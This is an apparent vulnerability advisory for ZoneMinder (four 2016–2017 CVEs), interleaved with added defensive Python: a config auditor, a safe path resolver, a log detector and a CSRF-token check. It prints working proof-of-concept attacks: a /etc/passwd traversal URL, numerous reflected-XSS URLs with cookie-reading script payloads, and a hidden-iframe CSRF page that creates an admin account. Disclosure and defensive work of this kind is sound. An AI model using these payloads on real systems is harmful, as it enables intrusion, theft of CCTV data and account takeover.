ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass

Posted Feb 6, 2017
Authored by John Marzella

Various ZoneMinder versions suffer from authentication bypass, cross site request forgery, cross site scripting, information disclosure, and file disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure, csrf
advisories | CVE-2016-10140, CVE-2017-5367, CVE-2017-5368, CVE-2017-5595
SHA-256 | f68406098b52c99e74b1f00852c84f5caac953bfa36f870cdd77222ec5580f4d

==========================================================================
Product: ZoneMinder
Versions: Multiple versions - see inline
Vulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure
CVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140
Author: John Marzella
Date: 03/02/2017
==========================================================================



CVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29
==========================================================================
Contacted vendor on 08/11/2016

The Apache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories
in the web root; for example, such an attacker can view all CCTV images stored on the server.

PoC: http://<serverIP>/events

Fix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba
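A defender's first question after this finding is which <Directory> blocks in an Apache configuration still have directory listing switched on. The script below is an added example, not ZoneMinder's code or its shipped configuration: it parses a constructed Apache virtual-host fragment (the paths under /usr/share/zoneminder/www are assumed, not taken from the project) and computes the effective Options for each directory, applying Apache's rule that an Options line without +/- prefixes replaces what was inherited while +/- forms adjust it.

```python
import re
from typing import Dict, List

# Constructed sample resembling the kind of configuration described above.
# The directory paths are assumptions for illustration, not ZoneMinder's own.
SAMPLE_CONFIG = """
<VirtualHost *:80>
    DocumentRoot /usr/share/zoneminder/www
    <Directory /usr/share/zoneminder/www>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
    <Directory /usr/share/zoneminder/www/events>
        Options -Indexes
    </Directory>
    <Directory /usr/share/zoneminder/www/skins>
        Options +MultiViews
    </Directory>
</VirtualHost>
"""

DIR_RE = re.compile(r'<Directory\s+"?([^">\s]+)"?\s*>', re.IGNORECASE)
END_RE = re.compile(r"</Directory>", re.IGNORECASE)
OPT_RE = re.compile(r"^\s*Options\s+(.+?)\s*$", re.IGNORECASE)


def parse_options(config: str) -> Dict[str, List[str]]:
    """Map each <Directory> path to the raw Options tokens found inside it."""
    result: Dict[str, List[str]] = {}
    current = None
    for line in config.splitlines():
        m = DIR_RE.search(line)
        if m:
            current = m.group(1).rstrip("/")
            result.setdefault(current, [])
            continue
        if END_RE.search(line):
            current = None
            continue
        m = OPT_RE.match(line)
        if m and current is not None:
            result[current].extend(m.group(1).split())
    return result


def indexes_enabled(path: str, options: Dict[str, List[str]]) -> bool:
    """Decide whether listing is effectively on for `path`.

    Walk the matching <Directory> blocks from least to most specific. A list
    with no +/- prefixes replaces the inherited set (Indexes and All both turn
    listing on); a list of +/- tokens only adjusts the inherited value.
    """
    enabled = False
    for d in sorted(options, key=len):
        if path != d and not path.startswith(d + "/"):
            continue
        tokens = options[d]
        if not tokens:
            continue
        relative = all(t[0] in "+-" for t in tokens)
        if not relative:
            enabled = any(t.lower() in ("indexes", "all") for t in tokens)
        else:
            for t in tokens:
                if t[1:].lower() in ("indexes", "all"):
                    enabled = t[0] == "+"
    return enabled


def audit(config: str) -> List[str]:
    """Return the directories whose effective Options still include Indexes."""
    options = parse_options(config)
    return sorted(d for d in options if indexes_enabled(d, options))


if __name__ == "__main__":
    for d in audit(SAMPLE_CONFIG):
        print("directory listing enabled:", d)
```

Running it against the sample reports the web root and the skins directory, while the events directory is clean because its own block turns listing off; the fix is an explicit `Options -Indexes` (or a bare Options line without Indexes) on the web root itself, which every nested directory then inherits.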



CVE-2017-5595 - File disclosure - affects v1.xx - code from 2008
================================================================
Contacted vendor on 22/01/2017

A file disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 because unfiltered user input is passed to readfile() in views/file.php, which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data).

PoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd

Fix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3
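The root cause above is a path built by appending a request parameter to a base directory with no containment check. The following is an added example written in Python, not ZoneMinder's PHP or the contents of its fix commit: `vulnerable_resolve` mirrors the flaw as the text describes it, and `safe_resolve` shows the hardened form, which normalises the joined path and refuses anything that does not remain strictly inside the web root. The web root path is an assumption for illustration.

```python
import posixpath
from typing import Optional

# Assumed web root for the example; the real install path is not on the page.
WEB_ROOT = "/usr/share/zoneminder/www"


def vulnerable_resolve(base: str, user_path: str) -> str:
    """The flaw as described: request input is concatenated onto a base
    directory and handed to the file reader with no normalisation, so
    '..' segments walk out of the web root."""
    return base + "/" + user_path


def safe_resolve(base: str, user_path: str) -> Optional[str]:
    """Hardened form: join, normalise, then require strict containment.

    Returns the resolved path, or None when the request would escape `base`
    or carries a NUL byte (which truncates paths in C-based file APIs).
    In production, call os.path.realpath on the real filesystem before the
    containment check so symlinks inside the root cannot point outside it.
    """
    if "\x00" in user_path:
        return None
    base_norm = posixpath.normpath(base)
    # A leading slash would otherwise be treated as absolute by join().
    candidate = posixpath.normpath(posixpath.join(base_norm, user_path.lstrip("/")))
    if not candidate.startswith(base_norm + "/"):
        return None  # escaped the root, or asked for the root directory itself
    return candidate


if __name__ == "__main__":
    probe = "/../../../../../etc/passwd"   # the traversal shape from the advisory
    print("vulnerable:", vulnerable_resolve(WEB_ROOT, probe))
    print("hardened:  ", safe_resolve(WEB_ROOT, probe))
    print("legit:     ", safe_resolve(WEB_ROOT, "events/1/001-capture.jpg"))
```

The check is done on the normalised result rather than by searching the input for "..", so encodings and odd segment orderings that normalise to the same escape are caught by the same comparison.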



CVE-2017-5367 - XSS - affects v1.30 and v1.29
=============================================
Contacted vendor on 20/11/2016

Multiple reflected XSS vulnerabilities exist.

The following payload has been injected into the vulnerable URLs to show that the user's session cookie can be stolen.
%3Cscript%3Ealert(document.cookie);%3C/script%3E

In form input view using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword

In link input view using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E

In link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1

In form input view using GET at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2

In form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1

In form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1

In form input limit using POST at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

In link input limit using GET at http://<serverIP>/zm/index.php
PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

In form input limit using POST at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

In link input limit using GET at http://<serverIP>/zm/
PoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
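For a defender, the request shapes listed above (for the XSS cases here and the file-disclosure and directory-listing cases earlier) are what should stand out in the web server's access log. The script below is an added example and not part of the advisory: it parses constructed combined-format log lines modelled on those PoC URLs (IPs and timestamps are made up), URL-decodes each query parameter so encoded payloads are not missed, and labels requests that carry script tags in any parameter, a traversal segment in the `path` parameter of `view=file`, or a direct request for the /events directory.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (Apache combined format) modelled on the
# request shapes in the advisory. Addresses and times are invented.
SAMPLE_LOG = r'''
10.0.0.5 - - [03/Feb/2017:10:12:01 +0000] "GET /zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Feb/2017:10:12:07 +0000] "GET /zm/index.php?view=file&path=/../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Feb/2017:10:13:00 +0000] "GET /zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=25 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Feb/2017:10:13:30 +0000] "GET /events/ HTTP/1.1" 200 31337 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Feb/2017:10:14:02 +0000] "GET /zm/index.php?view=events&page=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Script-tag or javascript: URL inside a decoded parameter.
SCRIPT_RE = re.compile(r"<\s*script\b|javascript:", re.IGNORECASE)


def classify(url: str) -> List[str]:
    """Return the finding labels that apply to one request URL."""
    findings: List[str] = []
    parts = urlsplit(url)
    # parse_qsl percent-decodes keys and values, so %3Cscript%3E becomes <script>.
    params = parse_qsl(parts.query, keep_blank_values=True)
    for key, value in params:
        if SCRIPT_RE.search(value) or SCRIPT_RE.search(key):
            findings.append(f"xss:{key}")
    if any(k == "view" and v == "file" for k, v in params):
        path = next((v for k, v in params if k == "path"), "")
        if ".." in path.split("/"):
            findings.append("traversal:path")
    # A request for the events directory itself, outside the application,
    # is what directory listing on the web root exposes.
    if parts.path.rstrip("/") == "/events":
        findings.append("dirlisting:/events")
    return findings


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run classify() over every parsable line and return one record per hit."""
    hits: List[Dict[str, object]] = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify(m.group("url"))
        if labels:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "labels": labels,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], ",".join(hit["labels"]))
```

Only GET requests land in the access log in this form; the POST variants listed above would need the request body, so pair this with application-level logging or a web application firewall that inspects form fields. A 200 status on a flagged request is the detail worth alerting on, since it means the server served the reflected page or the file rather than rejecting it.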



CVE-2017-5368 - CSRF - affects v1.30 and v1.29
==============================================
Contacted vendor on 20/11/2016

No CSRF protection exists across the entire web app.

PoC: The following HTML page silently adds a new admin user to ZoneMinder if the admin user is already logged in.

csrf_poc_addUser.html

<!-- Example of silent CSRF using iframe -->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action="http://<serverIP>/zm/index.php" target="csrf-frame" id="csrf-form">
<input type="hidden" name="view" value="user"/>
<input type="hidden" name="action" value="user"/>
<input type="hidden" name="uid" value="0"/>
<input type="hidden" name="newUser[MonitorIds]" value=""/>
<input type="hidden" name="newUser[Username]" value="attacker1"/>
<input type="hidden" name="newUser[Password]" value="Password1234"/>
<input type="hidden" name="conf_password" value="Password1234"/>
<input type="hidden" name="newUser[Language]" value="en_gb"/>
<input type="hidden" name="newUser[Enabled]" value="1"/>
<input type="hidden" name="newUser[Stream]" value="View"/>
<input type="hidden" name="newUser[Events]" value="Edit"/>
<input type="hidden" name="newUser[Control]" value="Edit"/>
<input type="hidden" name="newUser[Monitors]" value="Edit"/>
<input type="hidden" name="newUser[Groups]" value="Edit"/>
<input type="hidden" name="newUser[System]" value="Edit"/>
<input type="hidden" name="newUser[MaxBandwidth]" value="high"/>
</form>
<script>document.getElementById("csrf-form").submit()</script>
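The page above works because the browser attaches the victim's session cookie to the forged POST and the application accepts any well-formed form as legitimate. The following is an added example of the standard countermeasure, written in Python and not taken from ZoneMinder or its fix: a per-session synchronizer token that the legitimate form embeds as a hidden field (a cross-origin page cannot read it, so it cannot forge it), compared in constant time on every state-changing request, plus an Origin/Referer check as defence in depth. The session dictionary, secret and the `handle_add_user` handler are assumptions for illustration.

```python
import hmac
import secrets
from typing import Dict, Optional

# Session store stands in for whatever the application keeps server-side.
Session = Dict[str, str]


def issue_token(session: Session) -> str:
    """Create a fresh anti-CSRF token and remember it in the session.

    The legitimate form embeds this value as a hidden field. A forged page on
    another origin never sees it, so its POST arrives without a valid copy.
    """
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def verify_token(session: Session, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted field against the session copy."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def origin_allowed(headers: Dict[str, str], own_origin: str) -> bool:
    """Defence in depth: a state-changing request must carry an Origin (or,
    failing that, a Referer) matching the site's own origin. Browsers send
    Origin on cross-site POSTs, so a forged submission fails here first."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == own_origin
    referer = headers.get("Referer")
    if referer is not None:
        return referer.startswith(own_origin + "/")
    return False


def handle_add_user(session: Session, form: Dict[str, str],
                    headers: Dict[str, str], own_origin: str) -> str:
    """Gate the user-creation action on both checks before doing any work."""
    if not origin_allowed(headers, own_origin):
        return "rejected: bad origin"
    if not verify_token(session, form.get("csrf_token")):
        return "rejected: bad token"
    return f"created user {form.get('newUser[Username]', '')}"


if __name__ == "__main__":
    session: Session = {}
    token = issue_token(session)
    site = "http://zm.example"
    # Legitimate submission from the application's own form.
    print(handle_add_user(session, {"csrf_token": token, "newUser[Username]": "alice"},
                          {"Origin": site}, site))
    # The forged POST from the page above: no token, cross-origin.
    print(handle_add_user(session, {"newUser[Username]": "attacker1"},
                          {"Origin": "http://evil.example"}, site))
```

The token check is the one that matters; the Origin check catches the forgery earlier and cheaper but cannot stand alone, because some clients and proxies strip both Origin and Referer, which is why a missing header is treated as a rejection rather than a pass.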
